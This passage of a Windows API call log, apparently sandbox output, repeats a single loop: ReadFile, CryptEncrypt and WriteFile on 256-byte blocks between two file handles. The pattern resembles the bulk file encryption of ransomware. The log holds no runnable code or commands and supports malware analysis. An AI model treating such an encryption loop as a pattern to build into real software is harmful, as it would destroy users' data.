pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.389] GetLastError () returned 0x0 [0165.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.389] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.389] GetLastError () returned 0x0 [0165.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.389] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.389] GetLastError () returned 0x0 [0165.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.389] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.389] GetLastError () returned 0x0 [0165.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.389] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.389] GetLastError () returned 0x0 [0165.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.389] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.389] GetLastError () returned 0x0 [0165.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.390] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.390] GetLastError () returned 0x0 [0165.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.391] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.391] GetLastError () returned 0x0 [0165.391] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.391] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.391] GetLastError () returned 0x0 [0165.391] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.391] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.391] GetLastError () returned 0x0 [0165.391] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.391] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.391] GetLastError () returned 0x0 [0165.391] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.391] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.391] GetLastError () returned 0x0 [0165.391] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.391] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.391] GetLastError () returned 0x0 [0165.391] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.391] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.392] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.392] GetLastError () returned 0x0 [0165.392] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.392] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.392] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.392] GetLastError () returned 0x0 [0165.392] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.392] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.392] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.392] GetLastError () returned 0x0 [0165.392] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.392] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.392] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.392] GetLastError () returned 0x0 [0165.392] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.392] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.392] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.392] GetLastError () returned 0x0 [0165.392] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.392] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.392] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.392] GetLastError () returned 0x0 [0165.392] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.392] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.393] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.393] GetLastError () returned 0x0 [0165.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.394] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.394] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.394] GetLastError () returned 0x0 [0165.394] WriteFile (in: hFile=0x15c4, 